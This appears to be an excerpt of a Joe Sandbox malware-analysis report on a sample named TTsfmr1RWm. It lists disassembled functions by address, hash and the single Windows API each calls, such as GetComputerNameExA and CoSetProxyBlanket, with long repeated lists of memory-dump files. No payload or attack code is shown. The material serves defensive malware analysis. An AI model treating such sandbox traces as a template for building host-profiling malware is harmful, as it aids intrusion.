Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 176f38b95e378c3834dcf7a6e01f57be319379d2a94014197839686336de32f8
Instruction ID: cc852ecb1ddf54a8d4f71d24963484a19678aa0fe4b6655cf575184f93e190bd
Opcode Fuzzy Hash: 176f38b95e378c3834dcf7a6e01f57be319379d2a94014197839686336de32f8
Instruction Fuzzy Hash: E3411474D003409FE7149F7899D6A5A7F71EB46324F51429CE4A02F3A6C631540ACBE2

Function 0093EF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0093F09C

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 13f279254728f3dcae92aa018f1be18813912ed4e3310747c34da7faab5bdd1e
Instruction ID: a661dd0062dff81a0748133cefb5117dcc1919ed1cac0df46b13960a42e2eaff
Opcode Fuzzy Hash: 13f279254728f3dcae92aa018f1be18813912ed4e3310747c34da7faab5bdd1e
Instruction Fuzzy Hash: 8E41C6B4910B40AFD370EF39990B7137EB8AB05250F504B1EF9EA866D4E231A4198BD7

Function 0095D7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,?,?), ref: 0095DD03

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f1237b15b6798667fe80bbb1c34d0e8c6a44d18a7a7692040dce647797b5ca50
Instruction ID: 318caa2c24965dea0850e8ae4af58c434866ddbbbe50546985fd0d30ed2338a9
Opcode Fuzzy Hash: f1237b15b6798667fe80bbb1c34d0e8c6a44d18a7a7692040dce647797b5ca50
Instruction Fuzzy Hash: 1221B2701057918BD736CF25C460722BBE1BF5B301B18858DD8D38B782CA78A485D761

Function 0095DC76 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,?,?), ref: 0095DD03

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 29b72dadce5eb42f24037659ea1f617d19cf21a603ea0c3f8d70fa0ccf5a7aee
Instruction ID: 04a5ca2691a1fe99b749f69c6de0fce5bae3c79abcf297670f109a1f8482747e
Opcode Fuzzy Hash: 29b72dadce5eb42f24037659ea1f617d19cf21a603ea0c3f8d70fa0ccf5a7aee
Instruction Fuzzy Hash: 0211C4B06447918BD725CB25C860722BBE2BF4A301B1CC69DD496CB382CA74D485D761

Function 0096E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 0096E0E0

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6c196db8cdc45df9edcf4fc4e56894a198af558503184bceb7f90000fcc5e14f
Instruction ID: 9f75284696de5e7d1bbc8739b1ce5d155d607b31c7c8e228f117670b61b787a6
Opcode Fuzzy Hash: 6c196db8cdc45df9edcf4fc4e56894a198af558503184bceb7f90000fcc5e14f
Instruction Fuzzy Hash: A8F0E57282C211FBC3102F38BD05B973AB4EFC3720F150835F4055B120EB35E81696A2

Function 0093EC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0093ECA3

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 43a5eaaa1ba716865cd9d8e41a20b3bc4e837fd12fbecb2184a73c888c3e715f
Instruction ID: d25f0adeccc7bf3adc9c868dac31a3cfde054c44b1a7d70000ad3ade1a009800
Opcode Fuzzy Hash: 43a5eaaa1ba716865cd9d8e41a20b3bc4e837fd12fbecb2184a73c888c3e715f
Instruction Fuzzy Hash: 0FE092343EA342BAF67982149CA3F2622069B42F28E305B15B3213D7D4CED03142824D

Function 00960B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00960B74

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
